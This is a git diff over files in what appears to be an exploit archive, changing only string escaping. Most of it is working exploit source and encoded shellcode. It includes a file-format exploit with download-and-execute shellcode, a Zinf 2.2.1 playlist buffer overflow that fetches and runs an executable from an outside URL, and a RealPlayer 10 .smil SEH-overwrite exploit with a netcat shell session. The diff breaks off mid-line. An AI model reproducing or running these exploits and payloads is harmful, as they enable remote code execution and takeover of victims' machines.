+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x35\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\xb3\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x3d\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x4a\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x1f\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\xdd\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x00\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\xf8\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x05\x05\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x10\x11\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x0a\x11\x11"
+"\x11\x11\x19\x0a\x01\x01\x01\x01\x10\x0e\x01\x01\x01\x01\x01\x05"
+"\x08\x1f\x01\x15\x11\x1c\x1c\x0a\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x08\x11\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x10\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x19\x00\x0c\x19\x08"
+"\x11\x00\x08\xfb\x01\x01\x08\x11\x01\x01\x01\x01\x01\x0a\x00\x1f"
+"\x1f\x11\x08\x0a\x19\x00\x05\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\xcd\x01\x01\x01\x01"
+"\x8b\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x1a\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01";
 
 unsigned char DownExec[] =
-\"\\xeb\\x10\\x5a\\x4a\\x33\\xc9\\x66\\xb9\\x3c\\x01\\x80\\x34\\x0a\\x99\\xe2\\xfa\"
-\"\\xeb\\x05\\xe8\\xeb\\xff\\xff\\xff\\x70\\x4c\\x99\\x99\\x99\\xc3\\xfd\\x38\\xa9\"
-\"\\x99\\x99\\x99\\x12\\xd9\\x95\\x12\\xe9\\x85\\x34\\x12\\xd9\\x91\\x12\\x41\\x12\"
-\"\\xea\\xa5\\x12\\xed\\x87\\xe1\\x9a\\x6a\\x12\\xe7\\xb9\\x9a\\x62\\x12\\xd7\\x8d\"
-\"\\xaa\\x74\\xcf\\xce\\xc8\\x12\\xa6\\x9a\\x62\\x12\\x6b\\xf3\\x97\\xc0\\x6a\\x3f\"
-\"\\xed\\x91\\xc0\\xc6\\x1a\\x5e\\x9d\\xdc\\x7b\\x70\\xc0\\xc6\\xc7\\x12\\x54\\x12\"
-\"\\xdf\\xbd\\x9a\\x5a\\x48\\x78\\x9a\\x58\\xaa\\x50\\xff\\x12\\x91\\x12\\xdf\\x85\"
-\"\\x9a\\x5a\\x58\\x78\\x9b\\x9a\\x58\\x12\\x99\\x9a\\x5a\\x12\\x63\\x12\\x6e\\x1a\"
-\"\\x5f\\x97\\x12\\x49\\xf3\\x9d\\xc0\\x71\\xc9\\x99\\x99\\x99\\x1a\\x5f\\x94\\xcb\"
-\"\\xcf\\x66\\xce\\x65\\xc3\\x12\\x41\\xf3\\x98\\xc0\\x71\\xa4\\x99\\x99\\x99\\x1a\"
-\"\\x5f\\x8a\\xcf\\xdf\\x19\\xa7\\x19\\xec\\x63\\x19\\xaf\\x19\\xc7\\x1a\\x75\\xb9\"
-\"\\x12\\x45\\xf3\\xb9\\xca\\x66\\xce\\x75\\x5e\\x9d\\x9a\\xc5\\xf8\\xb7\\xfc\\x5e\"
-\"\\xdd\\x9a\\x9d\\xe1\\xfc\\x99\\x99\\xaa\\x59\\xc9\\xc9\\xca\\xcf\\xc9\\x66\\xce\"
-\"\\x65\\x12\\x45\\xc9\\xca\\x66\\xce\\x69\\xc9\\x66\\xce\\x6d\\xaa\\x59\\x35\\x1c\"
-\"\\x59\\xec\\x60\\xc8\\xcb\\xcf\\xca\\x66\\x4b\\xc3\\xc0\\x32\\x7b\\x77\\xaa\\x59\"
-\"\\x5a\\x71\\xbf\\x66\\x66\\x66\\xde\\xfc\\xed\\xc9\\xeb\\xf6\\xfa\\xd8\\xfd\\xfd\"
-\"\\xeb\\xfc\\xea\\xea\\x99\\xde\\xfc\\xed\\xca\\xe0\\xea\\xed\\xfc\\xf4\\xdd\\xf0\"
-\"\\xeb\\xfc\\xfa\\xed\\xf6\\xeb\\xe0\\xd8\\x99\\xce\\xf0\\xf7\\xdc\\xe1\\xfc\\xfa\"
-\"\\x99\\xdc\\xe1\\xf0\\xed\\xcd\\xf1\\xeb\\xfc\\xf8\\xfd\\x99\\xd5\\xf6\\xf8\\xfd\"
-\"\\xd5\\xf0\\xfb\\xeb\\xf8\\xeb\\xe0\\xd8\\x99\\xec\\xeb\\xf5\\xf4\\xf6\\xf7\\x99\"
-\"\\xcc\\xcb\\xd5\\xdd\\xf6\\xee\\xf7\\xf5\\xf6\\xf8\\xfd\\xcd\\xf6\\xdf\\xf0\\xf5\"
-\"\\xfc\\xd8\\x99\";
+"\xeb\x10\x5a\x4a\x33\xc9\x66\xb9\x3c\x01\x80\x34\x0a\x99\xe2\xfa"
+"\xeb\x05\xe8\xeb\xff\xff\xff\x70\x4c\x99\x99\x99\xc3\xfd\x38\xa9"
+"\x99\x99\x99\x12\xd9\x95\x12\xe9\x85\x34\x12\xd9\x91\x12\x41\x12"
+"\xea\xa5\x12\xed\x87\xe1\x9a\x6a\x12\xe7\xb9\x9a\x62\x12\xd7\x8d"
+"\xaa\x74\xcf\xce\xc8\x12\xa6\x9a\x62\x12\x6b\xf3\x97\xc0\x6a\x3f"
+"\xed\x91\xc0\xc6\x1a\x5e\x9d\xdc\x7b\x70\xc0\xc6\xc7\x12\x54\x12"
+"\xdf\xbd\x9a\x5a\x48\x78\x9a\x58\xaa\x50\xff\x12\x91\x12\xdf\x85"
+"\x9a\x5a\x58\x78\x9b\x9a\x58\x12\x99\x9a\x5a\x12\x63\x12\x6e\x1a"
+"\x5f\x97\x12\x49\xf3\x9d\xc0\x71\xc9\x99\x99\x99\x1a\x5f\x94\xcb"
+"\xcf\x66\xce\x65\xc3\x12\x41\xf3\x98\xc0\x71\xa4\x99\x99\x99\x1a"
+"\x5f\x8a\xcf\xdf\x19\xa7\x19\xec\x63\x19\xaf\x19\xc7\x1a\x75\xb9"
+"\x12\x45\xf3\xb9\xca\x66\xce\x75\x5e\x9d\x9a\xc5\xf8\xb7\xfc\x5e"
+"\xdd\x9a\x9d\xe1\xfc\x99\x99\xaa\x59\xc9\xc9\xca\xcf\xc9\x66\xce"
+"\x65\x12\x45\xc9\xca\x66\xce\x69\xc9\x66\xce\x6d\xaa\x59\x35\x1c"
+"\x59\xec\x60\xc8\xcb\xcf\xca\x66\x4b\xc3\xc0\x32\x7b\x77\xaa\x59"
+"\x5a\x71\xbf\x66\x66\x66\xde\xfc\xed\xc9\xeb\xf6\xfa\xd8\xfd\xfd"
+"\xeb\xfc\xea\xea\x99\xde\xfc\xed\xca\xe0\xea\xed\xfc\xf4\xdd\xf0"
+"\xeb\xfc\xfa\xed\xf6\xeb\xe0\xd8\x99\xce\xf0\xf7\xdc\xe1\xfc\xfa"
+"\x99\xdc\xe1\xf0\xed\xcd\xf1\xeb\xfc\xf8\xfd\x99\xd5\xf6\xf8\xfd"
+"\xd5\xf0\xfb\xeb\xf8\xeb\xe0\xd8\x99\xec\xeb\xf5\xf4\xf6\xf7\x99"
+"\xcc\xcb\xd5\xdd\xf6\xee\xf7\xf5\xf6\xf8\xfd\xcd\xf6\xdf\xf0\xf5"
+"\xfc\xd8\x99";
 
 int main(int argc, char *argv[]) {
   FILE* rasfile;
   char evilbuff[4000];
   
   if (argc!=3) {
-    printf(\"Usage: %s  \\n\",argv[0]);
+    printf("Usage: %s  \n",argv[0]);
     return 0;
   }
 	
@@ -305,8 +305,8 @@ int main(int argc, char *argv[]) {
   memcpy(evilbuff+0x380+sizeof(DownExec)-1,argv[1],strlen(argv[1]));
   memset(evilbuff+0x380+sizeof(DownExec)-1+strlen(argv[1]),0x80,1);
 		
-  if ((rasfile=fopen(argv[2],\"wb\"))==0) {
-    printf(\"[-] Unable to access file.\\n\");
+  if ((rasfile=fopen(argv[2],"wb"))==0) {
+    printf("[-] Unable to access file.\n");
     return 0;
   }
   
diff --git a/platforms/windows/local/559.c b/platforms/windows/local/559.c
index 92dc74a4e..728dee5b3 100755
--- a/platforms/windows/local/559.c
+++ b/platforms/windows/local/559.c
@@ -3,14 +3,14 @@
 -------------------------------Advisory----------------------------------
 Luigi Auriemma 
 
-I don\'t know why this bug has not been tracked but moreover I don\'t
+I don't know why this bug has not been tracked but moreover I don't
 completely know why it has not been fixed yet in the Windows version of
 Zinf.
 
 In short, Zinf is an audio player for Linux and Windows: http://www.zinf.org
 The latest Linux version is 2.2.5 while the latest Windows version is 2.2.1
 which is still vulnerable to a buffer-overflow bug in the management of the
-playlist files \".pls\".
+playlist files ".pls".
 
 This bug has been found and fixed by the same developers in the recent
 versions for Linux but, as already said, the vulnerable Windows version is
@@ -21,7 +21,7 @@ A simple proof-of-concept to test the bug is available here:
 
   http://aluigi.altervista.org/poc/zinf-bof.pls
 
-That\'s all, just to keep track of this bug and to warn who uses the Windows
+That's all, just to keep track of this bug and to warn who uses the Windows
 version.
 
 
@@ -52,20 +52,20 @@ jumps into a service pack independent address then it downloads and executes a f
 #define SIZE 4048
 
 
-char shellcode[] = \"\\xEB\"//xored with 0x1d
-\"\\x10\\x58\\x31\\xC9\\x66\\x81\\xE9\\x22\\xFF\\x80\\x30\\x1D\\x40\\xE2\\xFA\\xEB\\x05\\xE8\\xEB\\xFF\"
-\"\\xFF\\xFF\\xF4\\xD1\\x1D\\x1D\\x1D\\x42\\xF5\\x4B\\x1D\\x1D\\x1D\\x94\\xDE\\x4D\\x75\\x93\\x53\\x13\"
-\"\\xF1\\xF5\\x7D\\x1D\\x1D\\x1D\\x2C\\xD4\\x7B\\xA4\\x72\\x73\\x4C\\x75\\x68\\x6F\\x71\\x70\\x49\\xE2\"
-\"\\xCD\\x4D\\x75\\x2B\\x07\\x32\\x6D\\xF5\\x5B\\x1D\\x1D\\x1D\\x2C\\xD4\\x4C\\x4C\\x90\\x2A\\x4B\\x90\"
-\"\\x6A\\x15\\x4B\\x4C\\xE2\\xCD\\x4E\\x75\\x85\\xE3\\x97\\x13\\xF5\\x30\\x1D\\x1D\\x1D\\x4C\\x4A\\xE2\"
-\"\\xCD\\x2C\\xD4\\x54\\xFF\\xE3\\x4E\\x75\\x63\\xC5\\xFF\\x6E\\xF5\\x04\\x1D\\x1D\\x1D\\xE2\\xCD\\x48\"
-\"\\x4B\\x79\\xBC\\x2D\\x1D\\x1D\\x1D\\x96\\x5D\\x11\\x96\\x6D\\x01\\xB0\\x96\\x75\\x15\\x94\\xF5\\x43\"
-\"\\x40\\xDE\\x4E\\x48\\x4B\\x4A\\x96\\x71\\x39\\x05\\x96\\x58\\x21\\x96\\x49\\x18\\x65\\x1C\\xF7\\x96\"
-\"\\x57\\x05\\x96\\x47\\x3D\\x1C\\xF6\\xFE\\x28\\x54\\x96\\x29\\x96\\x1C\\xF3\\x2C\\xE2\\xE1\\x2C\\xDD\"
-\"\\xB1\\x25\\xFD\\x69\\x1A\\xDC\\xD2\\x10\\x1C\\xDA\\xF6\\xEF\\x26\\x61\\x39\\x09\\x68\\xFC\\x96\\x47\"
-\"\\x39\\x1C\\xF6\\x7B\\x96\\x11\\x56\\x96\\x47\\x01\\x1C\\xF6\\x96\\x19\\x96\\x1C\\xF5\\xF4\\x1F\\x1D\"
-\"\\x1D\\x1D\\x2C\\xDD\\x94\\xF7\\x42\\x43\\x40\\x46\\xDE\\xF5\\x32\\xE2\\xE2\\xE2\\x70\\x75\\x75\\x33\"
-\"\\x78\\x65\\x78\\x1D\";
+char shellcode[] = "\xEB"//xored with 0x1d
+"\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
+"\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13"
+"\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2"
+"\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
+"\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
+"\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48"
+"\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43"
+"\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96"
+"\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
+"\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47"
+"\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D"
+"\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33"
+"\x78\x65\x78\x1D";
 
 
 
@@ -76,8 +76,8 @@ char shellcode[] = \"\\xEB\"//xored with 0x1d
 int main(){
 
 char buffer[SIZE];
-char exploit[]=\"exploit.pls\";
-char head[]=\"[playlist]File1=\";
+char exploit[]="exploit.pls";
+char head[]="[playlist]File1=";
 int i=0;
 ULONG bytes=0;
 char *pointer=NULL;
@@ -99,13 +99,13 @@ DWORD jump=0x909025eb;
 HANDLE file=NULL;
 
 //this is a small messageBox app
-char web[]=\"http://www.delikon.de/klein.exe\";
+char web[]="http://www.delikon.de/klein.exe";
 
 
-printf(\"A Buffer overflow exploit against Zinf 2.2.1 for Win32\\n\");
-printf(\"Coded by Delikon|www.delikon.de|27.9.04\\n\");
-printf(\"all credits goes to Luigi Auriemma\\n\");
-printf(\"\\n [+] generate exploit.pls\\n\");
+printf("A Buffer overflow exploit against Zinf 2.2.1 for Win32\n");
+printf("Coded by Delikon|www.delikon.de|27.9.04\n");
+printf("all credits goes to Luigi Auriemma\n");
+printf("\n [+] generate exploit.pls\n");
 
 
 
@@ -116,8 +116,8 @@ memset(buffer,0x00,SIZE-1);
 
 if(file == (HANDLE)0xffffffff){
 
-	printf(\"\\t[+] error opening the file\\n\");
-	printf(\"PRESS A KEY\\n\");
+	printf("\t[+] error opening the file\n");
+	printf("PRESS A KEY\n");
 	getchar();
 	return -1;
 
@@ -130,7 +130,7 @@ if(file == (HANDLE)0xffffffff){
 	//
 	strcat(buffer,shellcode);
 	//search for the shellcode length
-	pointer=strstr(buffer,\"\\x22\\xff\");
+	pointer=strstr(buffer,"\x22\xff");
 	//weblength[0]-=strlen(web)+1;
 	weblength-=strlen(web)+1;
 	//increase it
@@ -172,7 +172,7 @@ if(file == (HANDLE)0xffffffff){
 	WriteFile(file,buffer,strlen(buffer),&bytes,0);
 
 	CloseHandle(file);
-	printf(\"\\n [+] ready press a key\\n\");
+	printf("\n [+] ready press a key\n");
 	getchar();
 
 
diff --git a/platforms/windows/local/863.cpp b/platforms/windows/local/863.cpp
index 22f3a64bc..ac4bf82ec 100755
--- a/platforms/windows/local/863.cpp
+++ b/platforms/windows/local/863.cpp
@@ -2,16 +2,16 @@
 Coded by nolimit@CiSO & Buzzdee
 greets to COREiSO & #news & flare  & class101 & ESI & RVL & everyone else I forget
 This uses a seh overwrite method, which takes advantage of the SEH being placed
-in multiple locations over the different OS\'s. Because of this, it should be
+in multiple locations over the different OS's. Because of this, it should be
 completely universal. :).
 Also, we added SEH for enterprise and Standard, if you have a diff 2k3 then deal with it and write your own in.
 
- C:\\tools>nc -vv SERVER 1554 
+ C:\tools>nc -vv SERVER 1554 
  SERVER [192.168.1.93] 1554 (?) open 
  Microsoft Windows 2000 [Version 5.00.2195] 
  (C) Copyright 1985-2000 Microsoft Corp. 
   
- C:\\Program Files\\Real\\RealPlayer> 
+ C:\Program Files\Real\RealPlayer> 
 
 */
 
@@ -19,46 +19,46 @@ Also, we added SEH for enterprise and Standard, if you have a diff 2k3 then deal
 #include 
 #include 
 char pre[]=
-\"\\n\"
-\"  \\n\"
-\"    \\n\"
-\"      \\n\"
-\"    \\n\"
-\"  \\n\"
-\"  \\n\"
-\"    \n"
+"  \n"
+"    \n"
+"      \n"
+"    \n"
+"  \n"
+"  \n"
+"    \"
-\"\";
+"  "
+"";
 
 char overflow[1700];
 int main(int argc,char *argv[])
@@ -67,31 +67,31 @@ int main(int argc,char *argv[])
 	FILE *vuln;
 	if(argc == 1)
 	{
-		printf(\"RealPlayer 10 .smil file local buffer overflow.\\n\");
-		printf(\"Coded by nolimit & buzzdee.\\n\");
-		printf(\"Usage: %s \\n\",argv[0]);
+		printf("RealPlayer 10 .smil file local buffer overflow.\n");
+		printf("Coded by nolimit & buzzdee.\n");
+		printf("Usage: %s \n",argv[0]);
 		return 1;
 	}
-	vuln = fopen(argv[1],\"w\");
+	vuln = fopen(argv[1],"w");
 	//build overflow buffer here.
 	memset(overflow,0x90,sizeof(overflow)); //fill with nops
-	memcpy(overflow+1068,\"\\xeb\\x08\\xeb\\x08\",4); //
